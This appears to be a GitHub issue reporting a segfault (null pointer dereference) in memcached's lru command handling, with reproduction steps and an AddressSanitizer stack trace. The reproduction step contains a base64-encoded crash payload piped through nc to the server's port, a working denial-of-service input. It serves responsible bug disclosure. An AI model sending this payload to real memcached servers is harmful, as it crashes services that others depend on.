Skip to content

segfault (null pointer dereference) during lru command handling #474

Closed
@stze

Description

@stze

Dear memcached team —

I have detected a SIGSEGV during the lru command handling.

Version

bb0980f

How to reproduce

Start memcached
$ memcached
Send malicious payload via nc:
$ echo -n "bHJ1IG1vZGUKb7G0AGxydWRl6gdtTk9UXw==" | base64 -d | nc 127.0.0.1 11211

ASAN

AddressSanitizer:DEADLYSIGNAL
=================================================================
==14929==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000582a7e bp 0x7f6082dfa8d0 sp 0x7f6082dfa780 T4)
==14929==The signal is caused by a READ memory access.
==14929==Hint: address points to the zero page.
    #0 0x582a7d in __wrap_strcmp (/home/stze/Documents/repositories/memcached/memcached+0x582a7d)
    #1 0x547ac4 in process_lru_command /home/stze/Documents/repositories/memcached/memcached.c:4543:13
    #2 0x54055d in process_command /home/stze/Documents/repositories/memcached/memcached.c:4920:9
    #3 0x53b30c in try_read_command /home/stze/Documents/repositories/memcached/memcached.c:5064:9
    #4 0x52a48e in drive_machine /home/stze/Documents/repositories/memcached/memcached.c:5500:17
    #5 0x52c76a in event_handler /home/stze/Documents/repositories/memcached/memcached.c:5782:5
    #6 0x7f6088099030  (/lib64/libevent-2.1.so.6+0x24030)
    #7 0x7f60880997c6 in event_base_loop (/lib64/libevent-2.1.so.6+0x247c6)
    #8 0x56f7ff in worker_libevent /home/stze/Documents/repositories/memcached/thread.c:387:5
    #9 0x7f608805b58d in start_thread (/lib64/libpthread.so.0+0x858d)
    #10 0x7f6087dd9682 in __GI___clone (/lib64/libc.so.6+0xfd682)

Please let me know what additional information I can provide to successfully reproduce the issue.

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions